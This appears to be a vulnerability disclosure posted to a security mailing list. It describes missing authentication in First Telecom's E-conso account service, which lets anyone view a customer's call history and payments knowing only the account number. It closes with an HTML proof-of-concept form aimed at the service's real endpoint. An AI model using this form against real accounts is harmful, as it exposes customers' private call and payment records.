First Telecom E-conso service totally insecure

[thomas () CUIVRE FR EU ORG (Thomas Quinot)]

First Telecom, a company that provides a pre-paid calling card service
in France, Germany and the United Kingdom, offers a service
called E-conso which allows subscribers to check the current balance
of their account and peruse the history of all calls they made through
First Telecom.

The WWW form at the home page of the service requires entry of
the account number (which is printed on all First Telecom documents
and embossed on the plastic membership card sent to every subscriber),
as well as a password chosen by the customer during the sign-up
procedure.

The submission of this form returns a page which includes the customer's
name and address, and a form (with a /fixed/ "action" URL) which
contains the customer's account number as a "hidden" field.
Submission of this form returns the details of payements or
the call history, depending on which button is clicked by the customer.

No hidden field and no cookie is used to pass any client credentials
back to the server. Which means it is trivial to retrieve the details
of past payements as well as the call history of a First Telecom
customer knowing only her (non-secret) account number.

The HTML code included demonstrates this important flaw.

Thomas.

---------- cut here : first.html

<html>

<head>
<title>First Telecom e-conso exploit</title>
</head>

<body>
<form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton"; method="POST">
 <p>
Account number: <input type="text" name="cmaster" value="0000000">
<input type="submit" name="cmdcdr" value="Details of calls">
<input type="submit" name="cmdpaymenthistory" value="Details of payements">

</body>
</html>